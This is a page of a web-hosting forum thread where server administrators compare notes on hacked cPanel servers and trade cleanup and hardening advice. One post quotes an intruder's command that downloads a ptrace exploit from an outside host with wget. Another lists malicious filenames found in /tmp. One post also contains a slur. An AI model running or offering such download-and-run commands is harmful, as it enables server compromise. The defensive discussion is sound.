Community Forums
Connect with us on LinkedIn
Community Notice
+ Reply to Thread
Page 2 of 2 FirstFirst 1 2
Results 16 to 25 of 25
  1. #16
    Member
    Join Date
    Aug 2001
    Posts
    111

    Default

    http://www.delta5.com.br/mirror/topdefacer/

    Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.

  2. #17
    Member
    Join Date
    Feb 2003
    Posts
    311

    Default

    Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
    I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol

  3. #18
    Member
    Join Date
    Aug 2002
    Posts
    111

    Default

    my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs

  4. #19
    Member
    Join Date
    Aug 2002
    Posts
    111

    Default

    deleted
    Last edited by ivaserver; 12-24-2003 at 08:49 AM.

  5. #20
    Member B12Org's Avatar
    Join Date
    Jul 2003
    Location
    Seattle Washington
    Posts
    694

    Default

    Originally posted by brumie
    oh yes just delete that uid
    i seen that too and delete the user line:
    pico /etc/passwd

    but believe it or not there must be hidden process
    run chkrootkit (search on this forum on how to install it)
    also check on tmp

    cd /tmp
    ls -la

    find weird unussual files/directory there
    but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull
    What counts as wierd or unusal files/dirs?

  6. #21
    Member
    Join Date
    Dec 2003
    Posts
    41

    Default

    What counts as wierd or unusal files/dirs?
    files are excutebale

    on the xmas day, my friend's server almost got hack
    u should check that weird file:

    so far we found this kind of files on several servers /tmp:
    .xcgi
    r00t
    w00t
    xp
    xmas
    gift
    r0nin
    anyname.c --> cc code compile able

    i'm sure there must be lots way they trying to hack
    sometimes they also mk directory name pretending like it was a session files

    -rw------- 1 nobody nobody 0 Dec 29 10:51 sess_f7139ec439e5ad737c9c22723b140123
    drwxr-xr-x 2 nobody nobody 4096 Dec 29 16:41 sess_f7139ec439e5ad737c9c22723b140xxx
    -rw------- 1 nobody nobody 435 Dec 28 23:42 sess_fa205a6f3a4b7a5d3a3affb915522456

    see the permission drwxr-xr-x
    that's directory, the man that got our server was did with that way, i can't believe when i'm enter that directory and found many executable files there

    anyway that was little story of my nightmares, i'm moving to another provider that helped me lots securing my box and watching like hawk
    oh yeah i can sleep better....

    suggestion: search thread on this forum about secure your box

    set tmp with noexec:
    http://forums.ev1servers.net/showthr...threadid=27771

    correct me if i'm wrong

  7. #22
    Member B12Org's Avatar
    Join Date
    Jul 2003
    Location
    Seattle Washington
    Posts
    694

    Default

    Oh, ok. I wasnt sure if you meant obviously unusual files, or computer nerd obvious. Thanks.

  8. #23
    Member
    Join Date
    Dec 2002
    Posts
    22

    Default Re: new server got hacked

    Originally posted by brumie
    Code:
    ...
    wget www.viperhaxu.hpg.com.br/ptrace
    ...
    Here are your hackers. Looks like 13 year olds.

  9. #24
    Member B12Org's Avatar
    Join Date
    Jul 2003
    Location
    Seattle Washington
    Posts
    694

    Default

    That file that you referenced is empty text file. Looks like whatever it was, its gone now. My experience was with a group calling themselves "techteam". Some hackers they were, they had to make their web page with frontpage

  10. #25
    Registered User
    Join Date
    Apr 2004
    Posts
    2

    Default

    excellent resource of knowledge
    Thank you

Similar Threads & Tags
Similar threads

  1. Is my server hacked?
    By azrael in forum cPanel and WHM Discussions
    Replies: 8
    Last Post: 05-14-2009, 06:39 PM
  2. my server is hacked
    By jcaldera in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 05-02-2009, 04:23 PM
  3. server has been hacked
    By aracrew in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 01-21-2008, 06:55 PM
  4. Server get hacked
    By vishwas in forum cPanel and WHM Discussions
    Replies: 5
    Last Post: 12-02-2005, 04:49 AM
  5. my server got hacked?
    By goodgbb in forum cPanel and WHM Discussions
    Replies: 2
    Last Post: 08-25-2005, 10:18 AM
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube